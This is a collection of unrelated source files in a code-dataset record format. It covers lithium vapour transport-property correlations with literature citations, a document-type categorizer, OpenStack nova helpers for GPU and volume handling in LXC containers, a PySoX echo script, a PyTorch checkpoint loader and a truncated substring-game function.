1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table IV\n\n Uncertainties: on the experiments:\n \"Average error for the value thus obtained is estimated to be 5 %.\"\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_eta1 = np.array([100, 112, 123, 134, 145, 155,\n 166, 176, 186, 196, 205, 215,\n 224, 233, 242, 250, 260, 268])\n interp = interp1d(data_T, data_eta1, kind='cubic', bounds_error=False)\n eta1 = 1e-7 * interp(TK)\n return eta1\n\ndef eta_sat_Vargaftik_1991_Table(TK):\n \"\"\"\n Saturated viscosity\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table IV\n\n Uncertainties: on the experiments:\n \"Average error for the value thus obtained is estimated to be 5 %.\"\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_eta_sat = np.array([97.2, 106, 113, 118, 123,\n 126, 129, 131, 133, 135, 137, 139,\n 140, 141, 143, 144, 146, 147])\n interp = interp1d(data_T, data_eta_sat, kind='cubic', bounds_error=False)\n eta_sat = 1e-7 * interp(TK)\n return eta_sat\n\n\n# Bouledroua et al, 2005 Phys. Scr. 71 519\ndef eta1_Bouledroua(TK):\n \"\"\"\n Viscosity of the monomers as a function of temperature.\n\n Bouledroua, M, A Dalgarno, and R Côté.\n “Viscosity and Thermal Conductivity of Li, Na, and K Gases.”\n Physica Scripta 71, no. 5 (January 1, 2005): 519–22. \n https://doi.org/10.1238/Physica.Regular.071a00519.\n \n \"The numerical values in the Tables\n can be reproduced by the simple formula\n $$ \\eta = A T^{\\alpha}, \\quad A = 0.234, \\quad \\alpha = 0.903$$\"\n\n \"\"\"\n A = 0.234\n alpha = 0.903\n eta1 = 1e-7 * A * TK**alpha\n return eta1\n\ndef eta1_Bouledroua_Table_I(TK):\n \"\"\"\n Parameters:\n TK, temperature in Kelvin. 200 < TK < 2000.\n\n Viscosity of the monomers as a function of temperature.\n\n Bouledroua, M, A Dalgarno, and R Côté.\n “Viscosity and Thermal Conductivity of Li, Na, and K Gases.”\n Physica Scripta 71, no. 5 (January 1, 2005): 519–22. \n https://doi.org/10.1238/Physica.Regular.071a00519.\n\n Data from Tables I and IV. Eta in micropoise.\n \"\"\"\n data_T = [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]\n data_eta1 = [23, 49, 75, 100, 123, 144, 164, 184, 202, 221]\n \n interp = interp1d(data_T, data_eta1, kind='cubic', bounds_error=False)\n eta1 = 1e-7 * interp(TK)\n return eta1\n\n# Stepanenko et al, Experimental $\\eta$ at high temperatures, 1986\ndef eta_Stepanenko(X2, T):\n \"\"\"\n Stepanenko, I. F., N. I. Sidorov, Y. V. Tarlakov, and V. S. Yargin.\n “Experimental Study of the Viscosity of \n Lithium Vapor at High Temperatures.” \n International Journal of Thermophysics 7, no. 4 (July 1986): 829–35.\n https://doi.org/10.1007/BF00503840.\n\n Equation (5).\n\n (the abstract suggests:) Valid for 1600 < T < 2000 K\n\n \"Based on the analysis of the experimental errors, the accuracy of the\n data obtained has been estimated to be 3-4%.\"\n \"\"\"\n eta = 1e-7 * (178 - 530 * (X2 - 0.05) +0.071 * (T - 1700))\n eta_filtered = np.where(T >= 1500., eta, np.nan)\n return eta_filtered\n\ndef eta_Stepanenko_Table():\n \"\"\"\n These tables are points at various pressures, probably not saturated.\n\n Stepanenko, I. F., N. I. Sidorov, Y. V. Tarlakov, and V. S. 
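\n\n# A quick cross-check sketch (illustrative, not part of the original module):\n# the three independent monomer-viscosity correlations above should agree to\n# within their quoted few-percent uncertainties.\ndef compare_eta1_correlations(TK=1000.0):\n    return {\n        'Vargaftik & Yargin 1985, Eq. (56)': eta1_Vargaftik_and_Yargin(TK),\n        'Vargaftik 1991, Eq. (6)': eta1_Vargaftik_1991_Eq_6(TK),\n        'Bouledroua 2005 power law': eta1_Bouledroua(TK),\n    }\n\n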
Yargin.\n “Experimental Study of the Viscosity of \n Lithium Vapor at High Temperatures.” \n International Journal of Thermophysics 7, no. 4 (July 1986): 829–35.\n https://doi.org/10.1007/BF00503840.\n\n Data from Table I.\n \"\"\"\n data = np.array([[1595, 163],\n [1607, 143],\n [1668, 187],\n [1692, 174],\n [1700, 183],\n [1715, 165],\n [1722, 160],\n [1747, 195],\n [1812, 184],\n [1815, 193],\n [1823, 193],\n [1852, 186],\n [1970, 210],\n [1983, 208]], dtype='float')\n data[:,1] = 1e-7 * data[:,1]\n return data\n\ndef eta1_Fialho_1993_Table(TK):\n data_T = np.arange(700,2100,100)\n data_eta1 = np.array([8.56,\n 9.71,\n 10.82,\n 11.89,\n 12.93,\n 13.93,\n 14.91,\n 15.86,\n 16.80,\n 17.72,\n 18.63,\n 19.53,\n 20.41,\n 21.30])\n interp = interp1d(data_T, data_eta1, kind='cubic', bounds_error=False)\n eta1 = 1e-6 * interp(TK)\n return eta1\n\n#### Thermal conductivity data\ndef lambda1_Vargaftik_and_Yargin(TK):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Equation 66, page 822.\n Valid 700 K < T < 2500 K\n \n Uncertainties: \"for lithium vapour, ± 3 % for monatomic gas, and ± 7 % at the saturation line\"\n \"\"\"\n lambda1 = 1e-4 * (587.7 + 0.4562 * (TK - 1000) - 20.5e-6 * (TK - 1000)**2)\n return lambda1\n\ndef lambda_Vargaftik_and_Yargin(x2, TK):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Equations 65 and 67, page 822.\n Valid 700 K < T < 2500 K\n\n Uncertainties: \"for lithium vapour, ± 3 % for monatomic gas, and ± 7 % at the saturation line\"\n \"\"\"\n T_r = 13583 + 0.297 * (TK - 1000) + 43e-6 * (TK - 1000)**2\n lambda1 = lambda1_Vargaftik_and_Yargin(TK)\n lambda_total = lambda1 * (1 - 3.84 * x2**1 + 13.6 * x2**2\n - 48 * x2**3 + 166 * x2**4\n - 576 * x2**5 + 1994 * x2**6 \n + 0.095 * (T_r / TK)**2 * (x2 * (1 - x2))/((1 + x2)**2)\n )\n return lambda_total\n\ndef lambda_sat_Vargaftik_and_Yargin_Table(TK):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Page 828, Table 37.\n\n Uncertainties: \"for lithium vapour, [...] ± 7 % at the saturation line\"\n \"\"\"\n data_T = np.arange(700,2025,25)\n data_lambda_sats = np.array([497.2, 519.0, 541.6, 565.1, 589.2,\n 613.9, 638.8, 664.0, 689.2, 714.3, 739.2, 763.6, 787.4,\n 810.6, 833.1, 854.6, 875.3, 895.0, 913.6, 931.2, 947.8,\n 963.3, 977.7, 991.0, \n 1003.4, 1014.8, 1025.2, 1034.6, 1043.3, 1051.0,\n 1058.0, 1064.3, 1069.9, 1074.8, 1079.1, 1082.9,\n 1086.1, 1088.9, 1091.2, 1093.2, 1094.8, 1096.0,\n 1097.0, 1097.7, 1098.1, 1098.3, 1098.3, 1098.2,\n 1097.8, 1097.3, 1096.7, 1096.0, 1095.1])\n interp = interp1d(data_T, data_lambda_sats, kind='cubic', bounds_error=False)\n lambda_sat = 1e-4 * interp(TK)\n return lambda_sat\n\ndef lambda1_Vargaftik_1991_Eq_5(TK):\n \"\"\"\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. 
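\n\n# A minimal sketch (not part of the original module): thermal conductivity on\n# the saturation line from the 1985 handbook correlations, chaining the\n# equilibrium constant and the Eq. (80) dimer fraction into Eqs. (65)-(67),\n# analogous to the viscosity chain used elsewhere in this module.\ndef lambda_sat_Vargaftik_and_Yargin(TK):\n    Keq = K_eq_Vargaftik_and_Yargin(TK)\n    P_kpa = press_best(TK) / 1000  # Pa -> kPa\n    x2 = x2_concentration_Vargaftik_and_Yargin(P_kpa, Keq)\n    return lambda_Vargaftik_and_Yargin(x2, TK)\n\n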
Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Equation (5)\n \"\"\"\n lambda1 = (541.0 + 0.485 * (TK - 1000)) * 1e-4\n return lambda1\n\ndef lambda_Vargaftik_1991_Eq_3(x2, TK):\n \"\"\"\n Thermal conductivity as a function of x2 and temperature\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n \"\"\"\n pass\n\n\ndef lambda1_Vargaftik_1991_Table(TK):\n \"\"\"\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table III\n\n Uncertainties: on the experiments:\n \"Average error for the value thus obtained is estimated to be 5 %.\"\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_lambda1 = np.array([450, 506, 558, 607, 655,\n 701, 745, 790, 834, 878, 921, 965, \n 1008, 1050, 1092, 1131, 1169, 1203])\n interp = interp1d(data_T, data_lambda1, kind='cubic', bounds_error=False)\n lambda1 = 1e-4 * interp(TK)\n return lambda1\n\ndef lambda_sat_Vargaftik_1991_Table(TK):\n \"\"\"\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table III.\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_lambda_sat = np.array([543, 652, 753, 841, 913,\n 966, 1003, 1029, 1045, 1055, 1058, 1058, 1054,\n 1048, 1041, 1031, 1020, 1006])\n interp = interp1d(data_T, data_lambda_sat, kind='cubic', \n bounds_error=False)\n lambda_sat = 1e-4 * interp(TK)\n return lambda_sat\n\n\ndef lambda1_Bouledroua_Table(TK):\n \"\"\"\n Parameters:\n TK, temperature in Kelvin. 200 < TK < 2000.\n\n Coefficients of thermal conductivity of the monomers.\n\n Bouledroua, M, A Dalgarno, and R Côté.\n “Viscosity and Thermal Conductivity of Li, Na, and K Gases.”\n Physica Scripta 71, no. 5 (January 1, 2005): 519–22. \n https://doi.org/10.1238/Physica.Regular.071a00519.\n\n Data from Table V. Lambda in the table is 10^{-3} W/mK.\n \"\"\"\n data = [[ 200, 10.31],\n [ 400, 21.97],\n [ 600, 33.63],\n [ 800, 44.84],\n [1000, 55.15],\n [1200, 64.57],\n [1400, 73.54],\n [1600, 82.51],\n [1800, 90.58],\n [2000, 99.10]]\n data = np.array(data)\n interp = interp1d(data[:,0], data[:,1], kind='cubic', bounds_error=False)\n lambda1 = 1e-3 * interp(TK)\n return lambda1\n\n#### Self-diffusion coefficients\ndef D11_Fialho_1993_Table(TK):\n \"\"\"\n Self-diffusion coefficient at 0.10 MPa for monoatomic lithium.\n\n Fialho, Paulo S., J.M.N.A. Fareleira, M.L.V. Ramires,\n and C.A. Nieto de Castro. \"Thermophysical Properties\n of Alkali Metal Vapours, Part I.A.\" \n Berichte Der Bunsen-Gesellschaft Fur Physikalische Chemie\n 97, no. 
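\n\n# A small consistency sketch (illustrative, not part of the original module):\n# the Eq. (5) linear fit and the Table III interpolation above should track\n# each other within the quoted ~5 % experimental error.\ndef compare_lambda1_1991(TK=1500.0):\n    return lambda1_Vargaftik_1991_Eq_5(TK), lambda1_Vargaftik_1991_Table(TK)\n\n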
11 (1993): 1487–92.\n\n Uncertainties: \"The average collisions integrals \n $\\bar{\\Omega}^{(l,s)}(T)$ are compared with the results obtained \n previously [1] in Fig 2. The agreement is very good for lithium,\n where the maximum deviation is less than ±1%.\"\n\n Data from Table 3.\n \"\"\"\n D_self_Fialho_1993_table = np.array([\n [700, 0.8885],\n [800, 1.1491],\n [900, 1.4393],\n [1000, 1.7589],\n [1100, 2.1077],\n [1200, 2.4859]])\n data = D_self_Fialho_1993_table\n interp = interp1d(data[:,0], data[:,1], kind='cubic', bounds_error=False)\n return 1e-4 * interp(TK)\n","sub_path":"lithdata/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":18677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594499542","text":"import os, collections\nfrom FileTypeSimpleCategorizer import FileTypeSimpleCategorizer\n\nclass FileTypeDocument(FileTypeSimpleCategorizer):\n @property \n def type_id(self):\n return 'Documents'\n\n def __init__(self):\n extensions = [\".txt\", \".rtf\", \".doc\", \".xdoc\", \".xls\", \".pdf\", \".xlsx\", \".docx\"]\n metadata = collections.OrderedDict()\n metadata['Category'] = ''\n metadata['Subcategory'] = ''\n metadata['Sub-subcategory'] = ''\n FileTypeSimpleCategorizer.__init__(self, extensions, metadata)\n \n def relative_path_from_metadata(self, metadata):\n categories = [metadata[key] for key in ['Category', \n 'Subcategory',\n 'Sub-subcategory']\n if metadata.has_key(key)]\n path_components = [category for category in categories if category != \"\"]\n if path_components == []:\n path_components = ['Unknown']\n return os.path.join(*path_components)\n","sub_path":"src/libentr/FileTypeDocument.py","file_name":"FileTypeDocument.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"462757650","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2011 University of Southern California\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
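\n\n# A hedged usage sketch for the FileTypeDocument categorizer above (the values\n# are hypothetical): relative_path_from_metadata joins the non-empty category\n# levels into a nested path and falls back to 'Unknown' when all are blank.\n# Note it calls metadata.has_key(), so the class as written targets Python 2.\n#\n#     ftd = FileTypeDocument()\n#     ftd.relative_path_from_metadata({'Category': 'Finance',\n#                                      'Subcategory': '2021',\n#                                      'Sub-subcategory': ''})   # -> 'Finance/2021'\n#     ftd.relative_path_from_metadata({'Category': ''})          # -> 'Unknown'\n\n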
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\"\"\"\nUtility functions\n to allow GPUs to be seen inside of LXC instance.\n to manage allocation/deallocation of gpu devices to/from VM\n\n**Related Flags**\n\n:instance_type_extra_specs:\n:dev_cgroups_path:full path of cgroup device of LXC\n:gpu_dev_major_number: major number of gpu device\n:gpu_dev_minor_number: start of the minor numbers of gpu device\n\n\"\"\"\nimport os\nimport subprocess\n\nfrom nova.compute import vm_states\nfrom nova import context as nova_context\nfrom nova import db\nfrom nova import exception\nfrom nova import flags\nfrom nova.openstack.common import cfg\nfrom nova.openstack.common import log as logging\nfrom nova import utils\n\n# Variables for tracking gpus available and gpus assigned\ngpus_available = []\ngpus_assigned = {}\nnum_gpus = None\nextra_specs = {}\n\nLOG = logging.getLogger(__name__)\n\ngpu_opts = [\n cfg.ListOpt('instance_type_extra_specs',\n default=[],\n help='a list of additional capabilities corresponding to '\n 'instance_type_extra_specs for this compute '\n 'host to advertise. Valid entries are name=value, pairs '\n 'For example, \"key1:val1, key2:val2\"'),\n cfg.StrOpt('dev_cgroups_path',\n default='/cgroup/devices/libvirt/lxc',\n help='Path of the LXC cgroup'),\n cfg.StrOpt('gpu_dev_major_number',\n default=195,\n help='Major number of GPU devices'),\n cfg.StrOpt('gpu_dev_minor_number',\n default=0,\n help='Start numer of minor number of GPU devices'),\n ]\n\nFLAGS = flags.FLAGS\nFLAGS.register_opts(gpu_opts)\n\n\ndef init_host_gpu():\n get_instance_type_extra_specs_capabilities()\n global gpus_available\n global num_gpus\n global extra_specs\n if 'gpus' in extra_specs:\n num_gpus = extra_specs['gpus']\n gpus_available = range(int(extra_specs['gpus']))\n\n\ndef update_status(data):\n global extra_specs\n for key in extra_specs.iterkeys():\n if 'gpus' == key:\n data['gpus'] = int(len(gpus_available))\n else:\n data[key] = extra_specs[key]\n return data\n\n\ndef get_instance_type_extra_specs_capabilities():\n \"\"\"Return additional capabilities to advertise for this compute host.\"\"\"\n global extra_specs\n for pair in FLAGS.instance_type_extra_specs:\n keyval = pair.split(':', 1)\n keyval[0] = keyval[0].strip()\n keyval[1] = keyval[1].strip()\n extra_specs[keyval[0]] = keyval[1]\n return extra_specs\n\n\ndef get_gpu_total():\n return len(gpus_available)\n\ndef allow_gpus(inst):\n global num_gpus\n dev_whitelist = os.path.join(FLAGS.dev_cgroups_path,\n inst['name'],\n 'devices.allow')\n # Allow Nvidia Controller\n perm = 'c %d:255 rwm\\n' % FLAGS.gpu_dev_major_number\n _PIPE = subprocess.PIPE\n utils.execute('tee', dev_whitelist, process_input=perm,\n run_as_root=True)\n for i in range(int(num_gpus)):\n # Allow each gpu device\n perm = 'c 195:%d rwm\\n' % (i + FLAGS.gpu_dev_minor_number)\n utils.execute('tee', dev_whitelist, process_input=perm,\n run_as_root=True)\n\n\ndef assign_gpus(context, inst, lxc_container_root):\n \"\"\"Assigns gpus to a specific instance\"\"\"\n global gpus_available\n global gpus_assigned\n# ctxt = nova_context.get_admin_context()\n gpus_in_meta = 0\n gpus_in_extra = 0\n\n env_file = lxc_container_root + '/etc/environment'\n instance_extra = db.instance_type_extra_specs_get(context,\n inst['instance_type_id'])\n msg = _(\"instance_extra is %s .\") % instance_extra\n LOG.debug(msg)\n msg = _(\"vcpus for this instance are %d .\") % inst['vcpus']\n LOG.debug(msg)\n if 'gpus' in inst['metadata']:\n 
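# 'gpus' may be requested via the instance metadata (read here) and/or via\n        # the flavor's extra_specs (read below); the larger of the two becomes\n        # gpus_needed before availability is checked.\n        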
gpus_in_meta = int(inst['metadata']['gpus'])\n        msg = _(\"gpus in metadata asked, %d .\") % gpus_in_meta\n        LOG.info(msg)\n    if 'gpus' in instance_extra:\n        gpus_in_extra = int(instance_extra['gpus'].split()[1])\n        msg = _(\"gpus in instance_extra asked, %d .\") % gpus_in_extra\n        LOG.info(msg)\n\n    if gpus_in_meta > gpus_in_extra:\n        gpus_needed = gpus_in_meta\n    else:\n        gpus_needed = gpus_in_extra\n    allow_gpus(inst)\n    gpus_assigned_list = []\n    if gpus_needed > len(gpus_available):\n        raise Exception(_(\"Overcommit Error\"))\n    for i in range(gpus_needed):\n        gpus_assigned_list.append(gpus_available.pop())\n    if gpus_needed:\n        gpus_assigned[inst['name']] = gpus_assigned_list\n        gpus_visible = str(gpus_assigned_list).strip('[]')\n        flag = \"CUDA_VISIBLE_DEVICES=%s\\n\" % gpus_visible\n        utils.execute('tee', env_file, process_input=flag,\n                      run_as_root=True)\n\n\ndef deassign_gpus(inst):\n    \"\"\"Releases the gpus assigned to a specific instance\"\"\"\n    global gpus_available\n    global gpus_assigned\n    if inst['name'] in gpus_assigned:\n        gpus_available.extend(gpus_assigned[inst['name']])\n        del gpus_assigned[inst['name']]\n    return\n\n\n'''\nThe following codes are used because the main stream's code\ndoes not work for LXC Raw image volume management.\n'''\n\n# Maps dev_key (init_pid + mountpoint) to the directory mounted inside the\n# container; without this module-level dict, attach_volume_lxc and\n# detach_volume_lxc below would raise NameError.\nlxc_mounts = {}\n\n\ndef attach_volume_lxc(self, connection_info, instance_name, \\\n        mountpoint, virt_dom):\n    # get device path\n    data = connection_info['data']\n    device_path = data['device_path']\n    LOG.info(_('attach_volume: device_path(%s)') % str(device_path))\n\n    # get id of the virt_dom\n    spid = str(virt_dom.ID())\n    LOG.info(_('attach_volume: pid(%s)') % spid)\n\n    # get PID of the init process\n    ps_command = subprocess.Popen(\"ps -o pid --ppid %s --noheaders\" % \\\n        spid, shell=True, stdout=subprocess.PIPE)\n    init_pid = ps_command.stdout.read()\n    init_pid = str(int(init_pid))\n    retcode = ps_command.wait()\n    assert retcode == 0, \"ps command returned %d\" % retcode\n\n    LOG.info(_('attach_volume: init_pid(%s)') % init_pid)\n    # get major, minor number of the device\n    s = os.stat(device_path)\n    major_num = os.major(s.st_rdev)\n    minor_num = os.minor(s.st_rdev)\n    LOG.info(_('attach_volume: path(%s)') % device_path)\n    LOG.info(_('attach_volume: major_num(%(major_num)d) ' \\\n        'minor_num(%(minor_num)d)') % locals())\n\n    # allow the device\n    dev_whitelist = os.path.join(FLAGS.dev_cgroups_path,\n                                 instance_name,\n                                 'devices.allow')\n    # Allow the disk\n    perm = \"b %d:%d rwm\" % (major_num, minor_num)\n    cmd = \"echo %s | sudo tee -a %s\" % (perm, dev_whitelist)\n    LOG.info(_('attach_volume: cmd(%s)') % cmd)\n    subprocess.Popen(cmd, shell=True)\n\n    cmd_lxc = 'sudo lxc-attach -n %s -- ' % init_pid\n    # check if 'mountpoint' already exists\n\n    LOG.info(_('attach_volume: mountpoint(%s)') % mountpoint)\n    dev_key = init_pid + mountpoint\n    LOG.info(_('attach_volume: dev_key(%s)') % dev_key)\n    if dev_key in lxc_mounts:\n        LOG.info(_('attach_volume: dev_key(%s) is already used') \\\n            % dev_key)\n        raise Exception(_('the same mount point(%s) is already used.')\\\n            % mountpoint)\n\n    # create device(s) for mount\n    # sudo lxc-attach -n pid -- mknod -m 777\n    # b \n    cmd = '/bin/mknod -m 777 %s b %d %d '\\\n        % (mountpoint, major_num, minor_num)\n    cmd = cmd_lxc + cmd\n    LOG.info(_('attach_volume: cmd (%s)') % cmd)\n    subprocess.call(cmd, shell=True)\n\n    # create a directory for mount\n    cmd = '/bin/mkdir -p /vmnt '\n    cmd = cmd_lxc + cmd\n    LOG.info(_('attach_volume: cmd (%s)') % cmd)\n    subprocess.call(cmd, shell=True)\n\n    # create a sub-directory for mount\n    found = 0\n    for n in range(0, 100):\n        dir_name = '/vmnt/vol' + 
str(n)\n cmd = cmd_lxc + '/bin/ls ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n p = subprocess.Popen(cmd, shell=True, \\\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n x = p.communicate()\n LOG.info(_('attach_volume: return x[0](%s)') % x[0])\n LOG.info(_('attach_volume: return x[1](%s)') % x[1])\n #if len(x[1]) > 5: # new \"No such file exists...\"\n s = x[1].lower()\n if (len(s) > 0 and s.find('no such') >= 0):\n # new \"No such file exists...\"\n cmd = cmd_lxc + ' /bin/mkdir ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n found = 1\n break\n if found == 0:\n cmd = '/bin/rm %s ' % (mountpoint)\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n raise Exception(_('cannot find mounting directories'))\n\n lxc_mounts[dev_key] = dir_name\n cmd = cmd_lxc + '/bin/chmod 777 ' + mountpoint\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n # mount\n cmd = cmd_lxc + ' /bin/mount ' + mountpoint + ' ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n p = subprocess.Popen(cmd, shell=True, \\\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n x = p.communicate()\n\n # change owner\n user = FLAGS.user\n user = user.rsplit(\"/\")\n user = user[len(user) - 1]\n cmd = '/bin/chown %s /vmnt' % user\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n cmd = '/bin/chown %s %s ' % (user, dir_name)\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n cmd = cmd_lxc + \" /bin/chmod 'og+w' \" + ' ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n\ndef detach_volume_lxc(self, connection_info, instance_name, \\\n mountpoint, virt_dom):\n # get id of the virt_dom\n spid = str(virt_dom.ID())\n LOG.info(_('detach_volume: pid(%s)') % spid)\n\n # get PID of the init process\n ps_command = subprocess.Popen(\"ps -o pid --ppid %s --noheaders\" \\\n % spid, shell=True, stdout=subprocess.PIPE)\n init_pid = ps_command.stdout.read()\n init_pid = str(int(init_pid))\n retcode = ps_command.wait()\n assert retcode == 0, \"ps command returned %d\" % retcode\n\n dev_key = init_pid + mountpoint\n if dev_key not in lxc_mounts:\n raise Exception(_('no such process(%(init_pid)s) or ' \\\n 'mount point(%(mountpoint)s)') % locals())\n dir_name = lxc_mounts[dev_key]\n\n LOG.info(_('detach_volume: init_pid(%s)') % init_pid)\n cmd_lxc = 'sudo lxc-attach -n %s -- ' % str(init_pid)\n cmd = cmd_lxc + ' /bin/umount ' + dir_name\n LOG.info(_('detach_volume: cmd(%s)') % cmd)\n p = subprocess.Popen(cmd, shell=True, \\\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n x = p.communicate()\n cmd = cmd_lxc + ' /bin/rmdir ' + dir_name\n LOG.info(_('detach_volume: cmd(%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n del lxc_mounts[dev_key] # delete dictionary entry\n\n cmd = cmd_lxc + ' /bin/rm ' + mountpoint\n LOG.info(_('detach_volume: cmd(%s)') % cmd)\n subprocess.call(cmd, shell=True)\n","sub_path":"nova/virt/gpu/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467547557","text":"#!/usr/bin/env python3\n\n\"\"\" 音声情報処理 n本ノック !! 
\"\"\"\n\n# Copyright (C) 2020 by Akira TAMAMORI\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# Commentary:\n# - PySoXを用いた音声情報処理シリーズ\n# - エコーをかける\n\nimport sox\n\nIN_WAVE_FILE = \"in.wav\" # 入力音声\nOUT_WAVE_FILE = \"echo.wav\" # エコー済み音声\n\n# create trasnformer (単一ファイルに対する処理)\ntransformer = sox.Transformer()\n\n# エコー の パラメタ\nn_echos = 2 # エコー回数\ndelays = [375] # 遅延時間 (ms)\ndecays = [0.5] # 減衰率\n\n# エコー回数分、遅延時間と減衰率を与える必要がある\n# → エコー回数に等しい長さの「リスト」を 遅延時間と減衰率それぞれで用意する\n# → n_echos が 2 なら遅延時間は [375, 750], 減衰率は [0.5, 0.25]\nfor i in range(1, n_echos):\n delays.append(delays[0] * (i + 1)) # 遅延時間は線形的\n decays.append(decays[0] ** (i + 1)) # 減衰率は指数的\n\n# エコーをかける\ntransformer.echo(n_echos=n_echos, delays=delays, decays=decays)\ntransformer.build(IN_WAVE_FILE, OUT_WAVE_FILE)\n","sub_path":"Chapter2_SoundEffect/pysox_echo.py","file_name":"pysox_echo.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578511372","text":"import os\nimport torch\n\ndef load_checkpoint(filename,model):\n if os.path.isfile(filename):\n print(\"=> loading checkpoint '{}'\".format(filename))\n checkpoint = torch.load(filename, map_location='cpu') # ,map_location='cpu'\n model.load_state_dict(checkpoint['state_dict'])\n print(\"=> loaded checkpoint '{}'\".format(filename))\n else:\n print(\"=> no checkpoint found at '{}'\".format(filename))\n return model\n","sub_path":"vote_agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359038619","text":"def getHighestCount(string):\n\n \"\"\"\n A program to check which player would win a match if player1 has substrings starting with vowels\n or if player2 has substrings starting with consonants\n \"\"\"\n\n\n vowel_string = ['A', 'E', 'I', 'O', 'U']\n string_length = len(string)\n\n\n # Players\n kevin_count = 0\n stuart_count = 0\n\n\n for char in range(string_length):\n if(string[char] in vowel_string):\n kevin_count += (string_length - char)\n else:\n stuart_count += (string_length - char)\n\n if (kevin_count > stuart_count):\n 